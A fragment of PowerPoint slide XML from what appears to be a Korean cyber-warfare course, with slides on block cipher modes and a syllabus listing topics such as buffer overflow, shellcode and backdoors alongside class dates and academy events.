            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– Block Cipher</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>ECB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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/Theory/T5/Block</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– Block Cipher</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>CBC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>각 블록에 사용된 키가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">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/Theory/T5/Block</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– Block Cipher</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>AES.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257469672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/Theory/T6 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>시스템 보안이란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>?</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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시스템 보안</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>권한 없는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>허가 받지 않은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용자에 의한 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>폴더 및 장치 등의 사용을 제한하여 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1">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OT(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>교관 및 강의계획 소개</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</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사이버전 실습체계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고전암호 크래킹</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카이사르 암호</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치환암호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> 암호</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75</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>기 졸업</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>임관식</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[3.12.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a: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시스템 보안 개념 및 운영체제 종류</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윈도우</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맥</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유닉스</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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시스템 명령어</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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alias, keyword, function, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>내부 명령어</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외부 명령어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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>wireshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>objdump</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>gdb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>,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파일 시스템 및 시스템 보안로그</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>ext</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파일 시스템 구조</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시스템 로그 변조 및 감지</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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사용자 계정 관리</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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사용자 계정 확인</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등록</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삭제</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패스워드 인증</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시스템 보안관리 및 침해상황 대비</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파일 권한 변조</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서비스 보안 강화 설정</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시스템 로그 점검</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, R-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>명령어 제한</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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외부 접속 탐지 및 보안</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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계정 원격 접속 및 우회 접속 탐지</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방화벽 설정</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a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>[4. 19.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>) ~ 23.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>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버퍼 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>오버플로우</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> 공격 및 대응</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시스템 메모리 구조</a:t>
                      </a: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복귀 주소 조작 및 대응</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돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>홍보출장</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>차</a:t>
                      </a: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4.28.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수업후</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4.30.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a: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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>쉘코드</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>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돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>어린이날</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[5. 5.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수</a:t>
                      </a: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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>옥포제</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[5.6.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>목</a:t>
                      </a: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~7(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a: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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>힙</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>오버플로우</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>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돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>석가탄신일</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[5.19.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수</a:t>
                      </a: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레이스 컨디션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130</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>기</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="9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OCS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>임관식</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>[5.28.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>)]</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="9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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>백도어</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>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a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>[6.7(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
